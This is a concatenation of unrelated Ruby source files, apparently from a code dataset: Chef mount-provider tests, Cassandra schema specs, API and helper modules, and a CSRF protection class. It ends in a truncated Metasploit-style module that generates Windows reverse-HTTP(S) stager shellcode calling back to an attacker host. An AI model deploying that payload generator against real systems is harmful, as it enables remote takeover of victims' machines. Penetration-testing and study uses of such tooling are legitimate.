let(:device) { "cartman:/share2" }
let(:mountpoint) { "/cartman" }
before do
provider.load_current_resource
end
it "should set the name on the current_resource" do
provider.current_resource.name.should == mountpoint
end
it "should set the mount_point on the current_resource" do
provider.current_resource.mount_point.should == mountpoint
end
it "should set the device on the current_resource" do
provider.current_resource.device.should == device
end
it "should set the device_type on the current_resource" do
provider.current_resource.device_type.should == device_type
end
it "should set the mounted status on the current_resource" do
expect(provider.current_resource.mounted).to be_true
end
it "should set the enabled status on the current_resource" do
expect(provider.current_resource.enabled).to be_true
end
it "should set the fstype field on the current_resource" do
expect(provider.current_resource.fstype).to eql("nfs")
end
it "should set the options field on the current_resource" do
expect(provider.current_resource.options).to eql(["rw", "soft", "noauto"])
end
it "should set the pass field on the current_resource" do
# is this correct or should it be nil?
expect(provider.current_resource.pass).to eql(0)
end
end
context "when the device is symlink" do
let(:target) { "/dev/mapper/target" }
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
#{target} on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#{target} /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
before do
File.should_receive(:symlink?).with(device).at_least(:once).and_return(true)
File.should_receive(:readlink).with(device).at_least(:once).and_return(target)
provider.load_current_resource()
end
it "should set mounted true if the symlink target of the device is found in the mounts list" do
expect(provider.current_resource.mounted).to be_true
end
it "should set enabled true if the symlink target of the device is found in the vfstab" do
expect(provider.current_resource.enabled).to be_true
end
it "should have the correct mount options" do
expect(provider.current_resource.options).to eql(["-", "noauto"])
end
end
context "when the device is a relative symlink" do
let(:target) { "foo" }
let(:absolute_target) { File.expand_path(target, File.dirname(device)) }
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
#{absolute_target} on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#{absolute_target} /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
before do
File.should_receive(:symlink?).with(device).at_least(:once).and_return(true)
File.should_receive(:readlink).with(device).at_least(:once).and_return(target)
provider.load_current_resource()
end
it "should set mounted true if the symlink target of the device is found in the mounts list" do
expect(provider.current_resource.mounted).to be_true
end
it "should set enabled true if the symlink target of the device is found in the vfstab" do
expect(provider.current_resource.enabled).to be_true
end
it "should have the correct mount options" do
expect(provider.current_resource.options).to eql(["-", "noauto"])
end
end
context "when the matching mount point is last in the mounts list" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t0d0s0 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200000 on Tue Jul 31 22:34:46 2012
/dev/dsk/c0t2d0s7 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted true" do
provider.load_current_resource()
provider.current_resource.mounted.should be_true
end
end
context "when the matching mount point is not last in the mounts list" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
/dev/dsk/c0t0d0s0 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200000 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted false" do
provider.load_current_resource()
provider.current_resource.mounted.should be_false
end
end
context "when the matching mount point is not in the mounts list (mountpoint wrong)" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 on /mnt/foob type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted false" do
provider.load_current_resource()
provider.current_resource.mounted.should be_false
end
end
context "when the matching mount point is not in the mounts list (raw device wrong)" do
let(:mount_output) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s72 on /mnt/foo type ufs read/write/setuid/intr/largefiles/xattr/onerror=panic/dev=2200007 on Tue Jul 31 22:34:46 2012
EOF
}
it "should set mounted false" do
provider.load_current_resource()
provider.current_resource.mounted.should be_false
end
end
context "when the mount point is last in fstab" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to true" do
provider.load_current_resource
provider.current_resource.enabled.should be_true
end
end
context "when the mount point is not last in fstab and is a substring of another mount" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s7 /mnt/foo/bar ufs 2 yes -
EOF
}
it "should set enabled to true" do
provider.load_current_resource
provider.current_resource.enabled.should be_true
end
end
context "when the mount point is not last in fstab" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s72 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
context "when the mount point is not in fstab, but the mountpoint is a substring of one that is" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foob ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
context "when the mount point is not in fstab, but the device is a substring of one that is" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
/dev/dsk/c0t2d0s72 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
context "when the mountpoint line is commented out" do
let(:vfstab_file_contents) {
<<-EOF.gsub /^\s*/, ''
#/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -
EOF
}
it "should set enabled to false" do
provider.load_current_resource
provider.current_resource.enabled.should be_false
end
end
end
context "after the mount's state has been discovered" do
describe "mount_fs" do
it "should mount the filesystem" do
provider.should_receive(:shell_out!).with("mount -F #{fstype} -o defaults #{device} #{mountpoint}")
provider.mount_fs()
end
it "should mount the filesystem with options if options were passed" do
options = "logging,noatime,largefiles,nosuid,rw,quota"
new_resource.options(options.split(/,/))
provider.should_receive(:shell_out!).with("mount -F #{fstype} -o #{options} #{device} #{mountpoint}")
provider.mount_fs()
end
it "should delete the 'noauto' magic option" do
options = "rw,noauto"
new_resource.options(%w{rw noauto})
provider.should_receive(:shell_out!).with("mount -F #{fstype} -o rw #{device} #{mountpoint}")
provider.mount_fs()
end
end
describe "umount_fs" do
it "should umount the filesystem if it is mounted" do
provider.should_receive(:shell_out!).with("umount #{mountpoint}")
provider.umount_fs()
end
end
describe "remount_fs" do
it "should use mount -o remount" do
provider.should_receive(:shell_out!).with("mount -o remount #{new_resource.mount_point}")
provider.remount_fs
end
end
describe "when enabling the fs" do
context "in the typical case" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7\t-\t/mnt/foo\tufs\t2\tyes\tdefaults\n" }
let(:vfstab_file_contents) { [other_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.load_current_resource
provider.enable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should enable the mountpoint we care about" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(this_mount)}/)
end
end
context "when the mount has options=noauto" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7\t-\t/mnt/foo\tufs\t2\tno\t-\n" }
let(:options) { [ "noauto" ] }
let(:vfstab_file_contents) { [other_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.load_current_resource
provider.enable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should enable the mountpoint we care about" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(this_mount)}/)
end
end
end
describe "when disabling the fs" do
context "in the typical case" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:vfstab_file_contents) { [other_mount, this_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.disable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should disable the mountpoint we care about" do
IO.read(vfstab_file.path).should_not match(/^#{Regexp.escape(this_mount)}/)
end
end
context "when there is a commented out line" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:comment) { "#/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:vfstab_file_contents) { [other_mount, this_mount, comment].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.disable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should disable the mountpoint we care about" do
IO.read(vfstab_file.path).should_not match(/^#{Regexp.escape(this_mount)}/)
end
it "should keep the comment" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(comment)}/)
end
end
context "when there is a duplicated line" do
let(:other_mount) { "/dev/dsk/c0t2d0s0 /dev/rdsk/c0t2d0s0 / ufs 2 yes -" }
let(:this_mount) { "/dev/dsk/c0t2d0s7 /dev/rdsk/c0t2d0s7 /mnt/foo ufs 2 yes -" }
let(:vfstab_file_contents) { [this_mount, other_mount, this_mount].join("\n") }
before do
provider.stub(:etc_tempfile).and_yield(Tempfile.open("vfstab"))
provider.disable_fs
end
it "should leave the other mountpoint alone" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(other_mount)}/)
end
it "should still match the duplicated mountpoint" do
IO.read(vfstab_file.path).should match(/^#{Regexp.escape(this_mount)}/)
end
it "should have removed the last line" do
IO.read(vfstab_file.path).should eql( "#{this_mount}\n#{other_mount}\n" )
end
end
end
end
end
| 35.776579 | 141 | 0.617253 |
b901a7e64ca4cbe796c066dbe514b11a0ffe56de | 651 | module RoleControl
module Actor
class DoChain
attr_reader :scope, :action, :actor
def initialize(actor, action)
@action = action
@actor = actor
end
def to(klass, context={}, add_active_scope: true)
@scope = klass.scope_for(action, actor, context)
if add_active_scope && klass.respond_to?(:active)
@scope = @scope.merge(klass.active)
end
self
end
def with_ids(ids)
@scope = scope.where(id: ids).order(:id) unless ids.blank?
self
end
end
def do(action, &block)
DoChain.new(self, action, &block)
end
end
end
| 21.7 | 66 | 0.583717 |
33e7341a434f35bacc2a46576541f6da24b1f34c | 659 | #
# Copyright 2015, Noah Kantrowitz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'poise_ruby/spec_helper/helper'
PoiseRuby::SpecHelper::Helper.install
| 34.684211 | 74 | 0.772382 |
0185d50e809cf656d46f2a9f6524863e47d80e6a | 709 | require 'mongo'
Mongo::Logger.logger = Logger.new("./logs/mongo.log")
class MongoDB
attr_accessor :users, :equipos
def initialize
client = Mongo::Client.new("mongodb://rocklov-db:27017/rocklov")
@users = client[:users]
@equipos = client[:equipos]
end
def remove_user(email)
@users.delete_many({email: email})
end
def get_user(email)
user = @users.find({email: email}).first
return user[:_id]
end
def remove_equipo(name, user_id)
obj_id = BSON::ObjectId.from_string(user_id)
@equipos.delete_many({name: name, user: obj_id})
end
def get_mongo_id
return BSON::ObjectId.new
end
end
| 18.179487 | 72 | 0.619182 |
e29c31a3a2d211416cd2b7b372406e55704d1eb4 | 469 | require "komachi_foundation/source"
require "thor"
module KomachiFoundation
class Generator < Thor::Group
include Thor::Actions
def self.source_paths
@_source_paths ||= Source.list
end
argument :file_name
source_root File.expand_path('../templates', __FILE__)
def copy_templates
if File.directory?(find_in_source_paths(file_name))
directory file_name
elsif
template file_name
end
end
end
end
| 18.76 | 58 | 0.690832 |
e90a20e34e6dd1d8c4f98925d050fbab561a8cd1 | 1,253 | # Copyright (c) 2017 Salesforce
# Copyright (c) 2009 37signals, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
module Takwimu
STATE, COUNTERS, GAUGES, TIMERS = 'takwimu.state', 'takwimu.counters', 'takwimu.gauges', 'takwimu.timers'
end
| 46.407407 | 107 | 0.772546 |
edb1f2e7739849be1a0e8a2fb591342b869ee902 | 604 | Pod::Spec.new do |s|
s.name = 'TAKUUID'
s.version = '1.5.0'
s.license = 'MIT'
s.summary = 'create UUID and store to Keychain library'
s.homepage = 'https://github.com/taka0125/TAKUUID'
s.author = { 'Takahiro Ooishi' => '[email protected]' }
s.source = { :git => 'https://github.com/taka0125/TAKUUID.git', :tag => s.version.to_s }
s.requires_arc = true
s.platform = :ios, '6.0'
s.ios.deployment_target = '6.0'
s.ios.frameworks = 'Security'
s.public_header_files = 'Classes/*.h'
s.source_files = 'Classes/*.{h,m}'
end
| 33.555556 | 96 | 0.581126 |
f838b43ad6d065aeeb71aa18c93ecdf7df704935 | 142 | module Hydra::Derivatives
class VideoDerivatives < Runner
def self.processor_class
Processors::Video::Processor
end
end
end
| 17.75 | 34 | 0.732394 |
4a7f17bd0118229a9d255e6f4589ea01f1e1ff82 | 1,560 | require 'helpers/shared_helpers'
require 'swagger_docs'
module API
module V1
# Root api endpoints
class Root < Grape::API
helpers SharedHelpers
helpers do
# Metadata communities hash with 'name => url' pairs.
# Return: [Hash]
# { community1: 'url/for/comm1', ..., communityN : 'url/for/commN' }
def metadata_communities
communities = EnvelopeCommunity.pluck(:name).flat_map do |name|
[name, url(name.dasherize)]
end
Hash[*communities]
end
end
desc 'API root'
get do
{
api_version: MetadataRegistry::VERSION,
total_envelopes: Envelope.not_deleted.count,
metadata_communities: metadata_communities,
info: url(:info)
}
end
desc 'Gives general info about the api node'
get :info do
{
metadata_communities: metadata_communities,
postman: 'https://www.getpostman.com/collections/bc38edc491333b643e23',
swagger: url(:swagger, 'index.html'),
readme: 'https://github.com/CredentialEngine/CredentialRegistry/blob/master/README.md',
docs: 'https://github.com/CredentialEngine/CredentialRegistry/tree/master/docs'
}
end
desc 'Render `swagger.json`'
get ':swagger_json', requirements: { swagger_json: 'swagger.json' } do
swagger_json = Swagger::Blocks.build_root_json [MR::SwaggerDocs]
present swagger_json.merge(host: request.host_with_port)
end
end
end
end
| 31.2 | 97 | 0.625 |
e802cf9f368a418b4dc211769530a9f861e6549c | 6,055 | require 'spec_helper'
describe 'cassandra::schema::table' do
context 'Create Table' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: false,
scl_name: 'nodefault',
keyspace: 'Excelsior',
columns:
{
'userid' => 'text',
'username' => 'FROZEN<fullname>',
'emails' => 'set<text>',
'top_scores' => 'list<int>',
'todo' => 'map<timestamp, text>',
'COLLECTION-TYPE' => 'tuple<int, text,text>',
'PRIMARY KEY' => '(userid)'
},
options:
[
'COMPACT STORAGE',
'ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\''
]
}
end
it do
is_expected.to compile
is_expected.to contain_cassandra__schema__table('users')
read_command = '/usr/bin/cqlsh -e "DESC TABLE Excelsior.users" localhost 9042'
exec_command = '/usr/bin/cqlsh -e "CREATE TABLE IF NOT EXISTS Excelsior.users '
exec_command += '(userid text, username FROZEN<fullname>, emails set<text>, top_scores list<int>, '
exec_command += 'todo map<timestamp, text>, tuple<int, text,text>, PRIMARY KEY (userid)) '
exec_command += 'WITH COMPACT STORAGE AND ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\'" localhost 9042'
is_expected.to contain_exec(exec_command).
only_with(unless: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Create Table with SCL' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: true,
scl_name: 'testscl',
keyspace: 'Excelsior',
columns:
{
'userid' => 'text',
'username' => 'FROZEN<fullname>',
'emails' => 'set<text>',
'top_scores' => 'list<int>',
'todo' => 'map<timestamp, text>',
'COLLECTION-TYPE' => 'tuple<int, text,text>',
'PRIMARY KEY' => '(userid)'
},
options:
[
'COMPACT STORAGE',
'ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\''
]
}
end
it do
is_expected.to compile
is_expected.to contain_cassandra__schema__table('users')
read_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"DESC TABLE Excelsior.users\" localhost 9042"'
exec_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"CREATE TABLE IF NOT EXISTS Excelsior.users '
exec_command += '(userid text, username FROZEN<fullname>, emails set<text>, top_scores list<int>, '
exec_command += 'todo map<timestamp, text>, tuple<int, text,text>, PRIMARY KEY (userid)) '
exec_command += 'WITH COMPACT STORAGE AND ID=\'5a1c395e-b41f-11e5-9f22-ba0be0483c18\'\" localhost 9042"'
is_expected.to contain_exec(exec_command).
only_with(unless: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Drop Table' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: false,
scl_name: 'nodefault',
keyspace: 'Excelsior',
ensure: 'absent'
}
end
it do
is_expected.to compile
read_command = '/usr/bin/cqlsh -e "DESC TABLE Excelsior.users" localhost 9042'
exec_command = '/usr/bin/cqlsh -e "DROP TABLE IF EXISTS Excelsior.users" localhost 9042'
is_expected.to contain_exec(exec_command).
only_with(onlyif: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Drop Table with SCL' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'users' }
let(:params) do
{
use_scl: true,
scl_name: 'testscl',
keyspace: 'Excelsior',
ensure: 'absent'
}
end
it do
is_expected.to compile
read_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"DESC TABLE Excelsior.users\" localhost 9042"'
exec_command = '/usr/bin/scl enable testscl "/usr/bin/cqlsh -e \"DROP TABLE IF EXISTS Excelsior.users\" localhost 9042"'
is_expected.to contain_exec(exec_command).
only_with(onlyif: read_command,
require: 'Exec[::cassandra::schema connection test]')
end
end
context 'Set ensure to latest' do
let :facts do
{
operatingsystemmajrelease: 7,
osfamily: 'RedHat',
os: {
'family' => 'RedHat',
'name' => 'RedHat',
'release' => {
'full' => '7.6.1810',
'major' => '7',
'minor' => '6'
}
}
}
end
let(:title) { 'foobar' }
let(:params) do
{
ensure: 'latest'
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
end
| 27.775229 | 128 | 0.514121 |
1dd8f4b4d3dcd75dfb7cddb77886a10a62be91a6 | 1,923 | module ApplicationHelper
include PresentersHelper
TRUNCATE_CHARS_DEFAULT = 300
def page_title(title)
@page_title ||= []
@page_title.push(title) if title.present?
@page_title.join(' | ')
end
def humanize_uri_code(vocab, code)
t("controlled_vocabularies.#{vocab}.#{code}")
end
def humanize_uri(vocab, uri)
code = CONTROLLED_VOCABULARIES[vocab].from_uri(uri)
return nil if code.nil?
humanize_uri_code(vocab, code)
end
def help_tooltip(text)
content_tag(:span, fa_icon('question-circle'), title: text)
end
# Simple wrapper around time_tag and time_ago_in_words to handle nil case (otherwise time_tag 500s)
# TODO: expand this to include displaying of a nice tooltip/title
# Issue here: https://github.com/ualbertalib/jupiter/issues/159
def jupiter_time_tag(date, format: '%F', blank_message: '')
return blank_message if date.blank?
time_tag(date, format: format)
end
def jupiter_time_ago_in_words(date, blank_message: '')
return blank_message if date.blank?
t('time_ago', time: time_ago_in_words(date))
end
def results_range(results)
# results come from a Jupiter query/search with pagination
first = results.offset_value + 1
last = results.offset_value + results.count
t(:page_range, first: first, last: last, total: results.total_count)
end
def search_link_for(object, attribute, value: nil, facet: true, display: nil)
value ||= object.send(attribute)
display ||= value
if facet
link_to(display, search_path(facets: object.class.facet_term_for(attribute, value)), rel: 'nofollow')
else
link_to(display, search_path(search: object.class.search_term_for(attribute, value)), rel: 'nofollow')
end
end
def jupiter_truncate(text, length: TRUNCATE_CHARS_DEFAULT, separator: ' ', omission: '...')
truncate text, length: length, separator: separator, omission: omission
end
end
| 32.05 | 108 | 0.720229 |
183482630b46bd9c53f73dd6c2e7590973b4b8f3 | 442 | require 'rails_helper'
# Specs in this file have access to a helper object that includes
# the DonationsHelper. For example:
#
# describe DonationsHelper do
# describe "string concat" do
# it "concats two strings with spaces" do
# expect(helper.concat_strings("this","that")).to eq("this that")
# end
# end
# end
RSpec.describe DonationsHelper, type: :helper do
pending "add some examples to (or delete) #{__FILE__}"
end
| 27.625 | 71 | 0.71267 |
e26e72be17554b96b98b5acebce7d167dc65aebe | 97 | module CacheDebugging
Digestor = CacheDigests::TemplateDigestor rescue ActionView::Digestor
end | 32.333333 | 71 | 0.85567 |
03db6b6bab02f7b94c0e26181facbdd81d68cd24 | 949 | require 'rack/protection'
module Rack
module Protection
##
# Prevented attack:: CSRF
# Supported browsers:: all
# More infos:: http://en.wikipedia.org/wiki/Cross-site_request_forgery
#
# Only accepts unsafe HTTP requests if a given access token matches the token
# included in the session.
#
# Compatible with Rails and rack-csrf.
#
# Options:
#
# authenticity_param: Defines the param's name that should contain the token on a request.
#
class AuthenticityToken < Base
default_options :authenticity_param => 'authenticity_token'
def accepts?(env)
session = session env
token = session[:csrf] ||= session['_csrf_token'] || random_string
safe?(env) ||
secure_compare(env['HTTP_X_CSRF_TOKEN'].to_s, token) ||
secure_compare(Request.new(env).params[options[:authenticity_param]].to_s, token)
end
end
end
end
| 29.65625 | 94 | 0.651212 |
87ba45d896d775ccb8df36b8cb8c5f786462d1ba | 20,522 | # -*- coding: binary -*-
module Msf
###
#
# Complex payload generation for Windows ARCH_X86 that speak HTTP(S) using WinHTTP
#
###
module Payload::Windows::ReverseWinHttp
include Msf::Payload::Windows::ReverseHttp
#
# Register reverse_winhttp specific options
#
def initialize(*args)
super
register_advanced_options([
OptBool.new('HttpProxyIE', 'Enable use of IE proxy settings', default: true, aliases: ['PayloadProxyIE'])
], self.class)
end
#
# Generate the first stage
#
def generate(opts={})
ds = opts[:datastore] || datastore
conf = {
ssl: opts[:ssl] || false,
host: ds['LHOST'] || '127.127.127.127',
port: ds['LPORT']
}
# Add extra options if we have enough space
if self.available_space.nil? || required_space <= self.available_space
conf[:uri] = luri + generate_uri
conf[:exitfunk] = ds['EXITFUNC']
conf[:verify_cert_hash] = opts[:verify_cert_hash]
conf[:proxy_host] = ds['HttpProxyHost']
conf[:proxy_port] = ds['HttpProxyPort']
conf[:proxy_user] = ds['HttpProxyUser']
conf[:proxy_pass] = ds['HttpProxyPass']
conf[:proxy_type] = ds['HttpProxyType']
conf[:retry_count] = ds['StagerRetryCount']
conf[:proxy_ie] = ds['HttpProxyIE']
conf[:custom_headers] = get_custom_headers(ds)
else
# Otherwise default to small URIs
conf[:uri] = luri + generate_small_uri
end
generate_reverse_winhttp(conf)
end
def transport_config(opts={})
transport_config_reverse_http(opts)
end
#
# Generate and compile the stager
#
def generate_reverse_winhttp(opts={})
combined_asm = %Q^
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
#{asm_block_api}
start:
pop ebp
#{asm_reverse_winhttp(opts)}
^
Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
end
#
# Determine the maximum amount of space required for the features requested
#
def required_space
# Start with our cached default generated size
space = cached_size
# Add 100 bytes for the encoder to have some room
space += 100
# Make room for the maximum possible URL length (wchars)
space += 512 * 2
# proxy (wchars)
space += 128 * 2
# EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
space += 31
# Custom headers? Ugh, impossible to tell
space += 512 * 2
# The final estimated size
space
end
#
# Convert a string into a NULL-terminated wchar byte array
#
def asm_generate_wchar_array(str)
(str.to_s + "\x00").
unpack("C*").
pack("v*").
unpack("C*").
map{ |c| "0x%.2x" % c }.
join(",")
end
#
# Generate an assembly stub with the configured feature set and options.
#
# @option opts [Bool] :ssl Whether or not to enable SSL
# @option opts [String] :uri The URI to request during staging
# @option opts [String] :host The host to connect to
# @option opts [Integer] :port The port to connect to
# @option opts [String] :verify_cert_hash A 20-byte raw SHA-1 hash of the certificate to verify, or nil
# @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
# @option opts [Integer] :retry_count The number of times to retry a failed request before giving up
#
def asm_reverse_winhttp(opts={})
retry_count = [opts[:retry_count].to_i, 1].max
verify_ssl = nil
encoded_cert_hash = nil
encoded_uri = asm_generate_wchar_array(opts[:uri])
encoded_host = asm_generate_wchar_array(opts[:host])
# this is used by the IE proxy functionality when an autoconfiguration URL
# is specified. We need the full URL otherwise the call to resolve the proxy
# for the URL doesn't work.
full_url = 'http'
full_url << 's' if opts[:ssl]
full_url << '://' << opts[:host]
full_url << ":#{opts[:port]}" if opts[:ssl] && opts[:port] != 443
full_url << ":#{opts[:port]}" if !opts[:ssl] && opts[:port] != 80
full_url << opts[:uri]
encoded_full_url = asm_generate_wchar_array(full_url)
encoded_uri_index = (full_url.length - opts[:uri].length) * 2
if opts[:ssl] && opts[:verify_cert_hash]
verify_ssl = true
encoded_cert_hash = opts[:verify_cert_hash].unpack("C*").map{|c| "0x%.2x" % c }.join(",")
end
proxy_enabled = !!(opts[:proxy_host].to_s.strip.length > 0)
proxy_info = ""
if proxy_enabled
if opts[:proxy_type].to_s.downcase == "socks"
proxy_info << "socks="
else
proxy_info << "http://"
end
proxy_info << opts[:proxy_host].to_s
if opts[:proxy_port].to_i > 0
proxy_info << ":#{opts[:proxy_port]}"
end
proxy_info = asm_generate_wchar_array(proxy_info)
end
proxy_user = opts[:proxy_user].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_user])
proxy_pass = opts[:proxy_pass].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:proxy_pass])
custom_headers = opts[:custom_headers].to_s.length == 0 ? nil : asm_generate_wchar_array(opts[:custom_headers])
http_open_flags = 0
secure_flags = 0
if opts[:ssl]
http_open_flags = (
0x00800000 | # WINHTTP_FLAG_SECURE
0x00000100 ) # WINHTTP_FLAG_BYPASS_PROXY_CACHE
secure_flags = (
0x00002000 | # SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
0x00001000 | # SECURITY_FLAG_IGNORE_CERT_CN_INVALID
0x00000200 | # SECURITY_FLAG_IGNORE_WRONG_USAGE
0x00000100 ) # SECURITY_FLAG_IGNORE_UNKNOWN_CA
else
http_open_flags = (
0x00000100 ) # WINHTTP_FLAG_BYPASS_PROXY_CACHE
end
ie_proxy_autodect = (
